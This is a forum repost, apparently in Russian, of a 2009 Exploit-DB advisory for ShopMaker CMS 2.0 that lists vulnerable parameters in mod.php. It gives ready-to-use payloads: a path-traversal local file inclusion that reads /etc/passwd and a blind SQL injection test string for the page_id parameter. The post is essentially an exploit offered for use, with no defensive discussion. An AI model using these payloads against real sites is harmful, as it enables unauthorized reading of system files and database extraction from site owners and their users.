Exploit ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9356
Проверка EDB
  1. Пройдено
Автор
PLATEN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-08-04
Код:
  Shopmaker CMS (bSQL/LFI) Multiple Remote Vulnerabilities


==============================================================================

Software : Shopmaker Asp 
version  : version 2.0
Vendor   : http://www.shopmaker.dk/
Author   : Platen  * mail: platen.secure[at]gmail.com
web      : Blog = Www.platen.gigfa.com ~ Www.pentesters.IR
Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake and all members in Pentesters.ir
==============================================================================


[LFI]

http://127.1.1.7/mod.php?mod=[LFI]

--------------------------------------------------------------------------

[BLIND SQL INJECTION ]

http://127.0.0.1/mod.php?mod=userpage&menu=130105&page_id=[BLIND]


--------------------------------------------------------------------------

exp:

lfi  ~~~~~~>  http://www.xxx.com/mod.php?mod=../../../../../../../../../../etc/passwd%00
                          
--------------------------------------------------------------------------
exp:

BLND ~~~~~~>  http://www.xxx.com:80/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+

# milw0rm.com [2009-08-04]
 
Источник
www.exploit-db.com

Похожие темы